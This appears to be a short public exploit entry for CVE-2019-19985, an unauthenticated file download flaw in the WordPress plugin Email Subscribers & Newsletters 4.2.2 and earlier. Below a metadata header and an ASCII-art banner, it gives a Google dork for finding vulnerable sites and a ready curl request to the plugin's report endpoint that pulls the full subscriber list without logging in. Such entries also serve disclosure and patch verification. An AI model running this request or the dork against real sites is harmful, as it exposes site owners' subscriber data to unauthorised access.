# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download # Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt # Date: 2020-07-20 # Exploit Author: KBA@SOGETI_ESEC # Vendor Homepage: https://www.icegram.com/email-subscribers/ # Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2 # Version: <= 4.2.2 # Tested on: Email Subscribers & Newsletters 4.2.2 # CVE : CVE-2019-19985 ################################################################################################ # ___ ___ ___ ___ ___ # # /\ \ /\ \ /\ \ /\ \ /\ \ ___ # # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ # # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ # # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ # # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ # # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / # # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ # # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ # # \::/ / \::/ / \::/ / \:\__\ \/__/ # # \/__/ \/__/ \/__/ \/__/ # # ___ ___ ___ ___ # # /\ \ /\ \ /\ \ /\ \ # # /::\ \ /::\ \ /::\ \ /::\ \ # # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ # # Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ # # Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ # # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ # # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ # # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ # # \:\__\ \::/ / \:\__\ \:\__\ # # KBAZ \/__/ \/__/ \/__/ \/__/ # # # # # ################################################################################################ curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all' EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'